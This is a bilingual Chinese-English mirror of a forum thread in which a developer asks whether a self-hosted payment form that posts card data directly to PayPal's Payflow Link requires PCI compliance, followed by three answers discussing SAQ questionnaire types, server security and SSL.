Payflow Link 是否需要 PCI 合规性?

发布于 2024-09-11 03:30:56 字数 375 浏览 4 评论 0原文

我曾尝试亲自致电 PayPal,电话代表甚至不知道 Payflow Link 可以这样工作,所以我不相信他的建议。我所有的搜索都遇到了不同的答案。

我正在使用 Payflow Link 构建一个电子商务网站,其中 CC 处理在 Paypal 托管页面上进行。不过,我正在考虑实施高级集成方法,即客户在我的服务器托管的表单上输入所有 CC 信息,但该表单通过 SSL 直接 POST 到 Paypal 的服务器。使用此方法,除了所需的 Paypal 收据页面之外,我可以维护网站的品牌。

使用这种方法的 CC 信息永远不会触及我的服务器。它们是否需要符合 PCI 标准?从技术角度来看,我不明白为什么要这样做,但从法律角度来看,我迷失在 PCI-DSS 文档的行话中。该网站每年大约进行 1000 笔交易。

I have tried calling PayPal themselves, and the rep on the phone didn't even know Payflow Link could work this way, so I don't trust his advice. All my searching has encountered mixed answers.

I am building an ecommerce site using Payflow Link, where the CC processing is handled on Paypal hosted pages. However, I am consider implementing the advanced integration method, whereby customers input all the CC info on a form hosted by my server, but the form gets POST'ed over SSL directly to Paypal's servers. Using this method, I can maintain the branding of my site except for the required Paypal reciept page.

The CC information, using this method, should never touch my servers. Are they required to be PCI compliant? From a technical standpoint, I can't see why it should, but from a legal standpoint, I get lost in the jargon of the PCI-DSS documents. The site does roughly 1000 transactions a year.

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

小清晰的声音 2024-09-18 03:30:56

我正在探索同样的问题。从与我们的 PCI 合规供应商的交谈来看,MikeH 的说法似乎是错误的。由于我们在网站上托管表单,因此服务器本身需要符合 PCI 标准。这是因为如果服务器不安全,表单可能会被黑客入侵。

我看到两个选项:

  1. 将表单保留在我们的网站上。确保服务器安全(我们的网络主机当前未通过 PCI 扫描,他们正在努力)。填写更长、更详细的 SAQ 验证类型 5(问卷 D)。

  2. 使用 Payflow Link 的信用卡捕获表单。无需担心服务器,可以使用更短的 SAQ 验证类型 1(问卷 A)。但是,我们会失去品牌并可能失去销售额,因为 Payflow Link 页面看起来如此不同。

SAQ D 很丑陋:-(

I'm exploring the same issue. From talking to our PCI compliance vendor, it sounds like MikeH is incorrect. Because we're hosting the form on our web site, the server itself needs to be PCI compliant. That's because the form could be hacked if the server is not secure.

I see two options:

  1. Keep the form on our site. Make the server secure (our web host does not currently pass the PCI scan, they are working on it). Fill in the much longer and detailed SAQ Validation Type 5 (Questionnaire D).

  2. Use Payflow Link's credit card capture form. Won't need to worry about the server, can then use the much shorter SAQ Validation Type 1 (Questionnaire A). But, we lose branding and may lose sales because the Payflow Link pages look so different.

The SAQ D is ugly :-(

┾廆蒐ゝ 2024-09-18 03:30:56

使用您提议的模型,您确实必须符合 PCI 标准,但与数据接触您的服务器时相比,限制级别要少得多。

有关详细信息,请转到 https://www.pcisecuritystandards.org/saq/instructions_dss.shtml 然后单击 SAQ 验证类型 1(问卷 A)的链接。这将准确告诉您作为所有持卡人功能均外包的商户必须实施 PCI DSS 的哪些部分。

希望这有帮助!

Using the model you are proposing, you do indeed have to be PCI-compliant, but at a much less restrictive level than you would if the data touched your server.

For details, goto https://www.pcisecuritystandards.org/saq/instructions_dss.shtml and click on the link for SAQ Validation Type 1 (Questionnaire A). This will tell you exactly what parts of the PCI DSS you must implement as a merchant with all cardholder functions outsourced.

Hope this helps!

风苍溪 2024-09-18 03:30:56

如果您通过网站接受信用卡付款,您必须遵守 PCI 规定。您需要走多远取决于您的实施。如果您托管用户用于付款的表单,则需要使用 SSL 证书,以便对页面进行加密(即使只是为了确保锁定图标出现在用户的浏览器中。没有它,您将无法每年进行 1000 笔交易)。

If you accept credit card payments through your website you have to be PCI compliant. How far you need to go will vary depending on your implementation. If you're hosting the form that the users are using to make payments you need to use an SSL certificate so that page is encrypted (even if only to make sure the lock icon appears in the user's browser. Without it you won't be doing 1000 transactions per year anymore).

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文